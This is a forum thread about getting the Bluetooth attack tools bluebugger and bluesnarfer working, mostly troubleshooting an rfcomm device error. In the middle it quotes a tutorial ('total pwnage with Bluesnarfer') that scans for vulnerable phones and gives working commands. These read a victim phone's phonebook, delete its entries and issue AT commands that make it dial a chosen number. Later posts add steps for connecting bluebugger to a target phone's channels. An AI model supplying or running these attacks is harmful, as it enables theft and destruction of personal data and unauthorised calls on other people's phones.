Bluebugger - /dev/rfcomm0 error

[imported_NjoyAP]

Hi all,
I have a problem with Bluebugger.
I can't get it to connect with /dev/rfcomm0

When i try
# bluebugger -a xx:xx:xx:xx:xx:xx info
i get the error
Cannot open '/dev/rfcomm0': Connection refused

When i try
# bluebugger -d /dev/rfcomm0 -a xx:xx:xx:xx:xx:xx info
I get the error
Cannot open '/dev/rfcomm00': No such file or directory (it put the extra 0 in)
# bluebugger -d /dev/rfcomm -a xx:xx:xx:xx:xx:xx info
Cannot open '/dev/rfcomm0': Connection refused

When i try
# bluebugger -d hci0 -a xx:xx:xx:xx:xx:xx info
Cannot open 'hci00': No such file or directory (it puts the extra 0)


I have tried mknod /dev/rfcomm0 c 216 0
and also rfcomm bind 0 11:11:11:11:11:11 1 (11:11:11:11:11:11 is the mac for my bt usb dongle)

There is an entry for rfcomm0 in my device list.
Can anyone pls point me in the right direction.
Thanx in advance.

Code:

#
# RFCOMM configuration file.
#

rfcomm0 {
	# Automatically bind the device at startup
	bind yes;

	# Bluetooth address of the device
	device 11:11:11:11:11:11;

	# RFCOMM channel for the connection
	channel 3;

	# Description of the connection
	comment "Nokia 7210i";
}

[imported_doggy]

hope this helps, it's of a web site by pauldotcom.com

Scanning for bluetooth and total pwnage with Bluesnarfer
first off, you are going to want to install the bluez libraries, and bluez utilities for your Linux distro of choice. Or use Backtrack...
Most installations will automatically start up the bluetooth adaptor as the hci0 interface. We can verify this with one of the bluez tools hciconfig. hciconfig without any other command line options will show us info on all of our bluetooth adaptors. If hci0 isn't up, we can set it up, with hciconfig hci0 up.
Verify bluetoothe devices exist in your environment with hcitool, another bluez utility. Use hcitool scan, and it will return all of the available BT devices with the btaddr (Mac address). Success? Sweet.
Btscanner can be used to scan as well, and obtain info in a format that is a little easier to use. You'll need to download and compile btscanner - we found that with the Linksys USBT100 btscanner works best when started with the --no-reset option. This will prevent btscanner from resetting hte device before starting. btscanner will scan for discoverable devices once started with the i comand - b will perform a bruteforce scan, scanning for all possible BT btaddrs!
Bluescanner for win32! Won't work with the default widcomm drivers though.
hcitool can also be used to obatin much of the same info as btscanner :-)
Got a vulnerable phone? Btscanner will compare the btaddr to a database, and list the attacks possible - mostly snarf attacks. The database is limited, so test what you discover in your environment.
record the btaddr of the device vulnerable to the snarf attack so we can use it with bluesnarfer. One problem with the default install of bluesnarfer is that bluesnarfer.h expects the bluetooth device to be connected to /dev/bluetooth/rfcomm/<device ID> (likely 0). I've tried modifying the source to point to the default install without much success and chasing my tail. Modding the source also isn't possible on Backtrack, where bluesnarfer doesn't work either! Yes, I tried 2.0.
The solution with the default sourcecode is real easy, this works for Backtack too. The problem is that the device nodes are missing for bluesnarfer to function, so let' create them. As root, do:
mkdir -p /dev/bluetooth/rfcomm then mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
These will not survive a reboot, so you may want to add them to startup, or create a script :-)
Once the nodes have been created, bluesnarfer will be happy. Let's use it.
In order to grab phonebook entries, we'll give bluesnarfer the -r switch folloewd by the phone book entries we want and the -b switch with the :
bluesnarfer -r 1-100 -b <btaddr>
Delete the phonebook? Sure!:
bluesnarfer -w 1-100 -b <btaddr>
Now the fun part. Custom AT commands. How about making the phone dial a number of our choice? We can issue AT commands to the vulnerable phones with the -c switch:
bluesnarfer -c 'ATDT5551212;' -b <baddr>
Note that we have to properly quote the AT command (with single quotes), and include a semicolon as the trailing command character.

[imported_NjoyAP]

Thanx for the reply. Was interesting.

I think my problem is in the channel number i.e. '-c 1'
# bluebugger -c 1 -a xx:xx:xx:xx:xx:xx info

Can any1 confirm what all the channels are.
Thanx.

[TehVillageIdiot]

im also a bit stumped on channel and port numbers also specific counrty codes for mobiles. ie does usa have a specific band for mobiles and does uk also or is the codes individualy set per company

thnxs

[pcstalljr]

Hi all,
I have a problem with Bluebugger.
I can't get it to connect with /dev/rfcomm0

When i try
# bluebugger -a xx:xx:xx:xx:xx:xx info
i get the error
Cannot open '/dev/rfcomm0': Connection refused

When i try
# bluebugger -d /dev/rfcomm0 -a xx:xx:xx:xx:xx:xx info
I get the error
Cannot open '/dev/rfcomm00': No such file or directory (it put the extra 0 in)
# bluebugger -d /dev/rfcomm -a xx:xx:xx:xx:xx:xx info
Cannot open '/dev/rfcomm0': Connection refused

When i try
# bluebugger -d hci0 -a xx:xx:xx:xx:xx:xx info
Cannot open 'hci00': No such file or directory (it puts the extra 0)


I have tried mknod /dev/rfcomm0 c 216 0
and also rfcomm bind 0 11:11:11:11:11:11 1 (11:11:11:11:11:11 is the mac for my bt usb dongle)

There is an entry for rfcomm0 in my device list.
Can anyone pls point me in the right direction.
Thanx in advance.

Code:

#
# RFCOMM configuration file.
#

rfcomm0 {
	# Automatically bind the device at startup
	bind yes;

	# Bluetooth address of the device
	device 11:11:11:11:11:11;

	# RFCOMM channel for the connection
	channel 3;

	# Description of the connection
	comment "Nokia 7210i";
}

yes i have that exact same problem i have a LENOVO 3000 N100 with internal bluetooth. i can scan my sidekick 2008 and other phones but when i use almost any bluetooth tool we have in backtrack i get this error

Cannot open '/dev/rfcomm0'; Connection refused

things ive also tryed:

Code:

hciconfig hci0 class 0x50204

(sets class to
Class: 0x50204
Service Classes: Positioning, Rendering
Device Class: Phone, Cellular
)

Code:

hciconfig hci0 lm MASTER

sets hci0's link mode to MASTER

i have edited the rfcomm.config file. and nothings worked.
ive been riping my hair out for 2 weeks now and still no luck

any and all help is greatly appreciated thanks

Code:

.:pcap:.

[viljokid]

I think I have made a little progress with rfcomm, let me know what you guys think.

I'll start from the start
hciconfig hci0 up
hciconfig -a
hcitool scan hcio
sdptool browse mac address
Now I noticed that with my phone it doesn't show DUN and sdptool won't enable it so I write down each channel it gives me. Which are 3,4,16,17

Now mr greens tutorial says to use
mknod -m 666 /dev/rfcomm0 c 216 x (replace x with a channel try them all)
I only enable rfcomm0 not rfcomm1 and rfcomm2
since bluebugger only allows you to connect to one channel at a time.

so after mknod -m 666 /dev/rfcomm0 c 216 x
I don't even bother with sdptool --add channel = x DUN
since I don't have it anyway , but I don't enable ftp or opush either.

What I do is go stright to bluebugger , I use bluebugger cause bluesnarfer won't respond at all for me so type.

bluebugger -m (choose a name to connect with) -d /dev/rfcomm -c (type in a channel try them all) -a (your mac address) info

Bluebugger seems to connect because it says MOBILE IDENTIFICATION ...................done.

However it doesn't list any infomation, Maby it's just this particular phone, maby this was no help at all , maby you can work out why.

[donpee]

I think I have made a little progress with rfcomm, let me know what you guys think.


bluebugger -m (choose a name to connect with) -d /dev/rfcomm -c (type in a channel try them all) -a (your mac address) info

.

.....with -d option you should use single digit like 0 for rfcomm0, 1 for rfcomm1, etc...
in bluebugger and bluesnarfer i use DUN channel with success.